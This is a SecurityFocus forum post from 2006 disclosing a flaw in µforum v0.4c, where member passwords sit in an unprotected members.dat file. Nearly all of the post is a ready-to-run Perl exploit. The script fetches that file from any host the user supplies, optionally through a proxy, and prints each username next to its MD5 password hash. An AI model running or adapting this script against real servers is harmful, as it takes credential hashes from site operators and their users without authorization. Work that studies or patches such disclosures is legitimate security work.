µforum v0.4c (members.dat) MD5 Passwd Hash Disclosure Poc Sep 01 2006 03:53PM
gmdarkfig gmail com
#!/usr/bin/perl

#

# Affected.scr..: µforum v0.4c

# Poc.ID........: 08060901

# Type..........: Member's passwords are stored in .dat file no protected by a .htaccess file

# Risk.level....: Medium

# Vendor.Status.: Unpatched

# Src.download..: comscripts.com/scripts/php.forum.1568.html

# Poc.link......: acid-root.new.fr/poc/08060901.txt

# Credits.......: DarkFig

#

use LWP::UserAgent;

use HTTP::Request;

use Getopt::Long;

use strict;

print STDOUT "\n+", '-' x 36, "+\n";

print STDOUT "| µforum v0.4c (members.dat) Exploit |\n";

print STDOUT '+', '-' x 36, "+\n";

my($host,$path,$proxh,$proxu,$proxp);

my $opt = GetOptions(

'host=s' => \$host,

'path=s' => \$path,

'proxh=s' => \$proxh,

'proxu=s' => \$proxu,

'proxp=s' => \$proxp);

if(!$path) {$path = '/';}

$host .= $path.'membres/members.dat';

if($host !~ /http/) {$host = 'http://'.$host;}

my $ua = LWP::UserAgent->new();

$ua->agent('Mozilla');

$ua->timeout(30);

$ua->proxy(['http'] => $proxh) if $proxh;

my $req = HTTP::Request->new('GET', $host);

$req->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $res = $ua->request($req);

my $dat = $res->content;

my @tabl= split(/:/, $dat);

foreach (@tabl) {

if($_ =~ /"(.*)";a/){

print "\n".$1.'::';}

if($_ =~ /"([a-z0-9]{32})";i/){

print $1;}

}

print "\n";

exit(0);

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus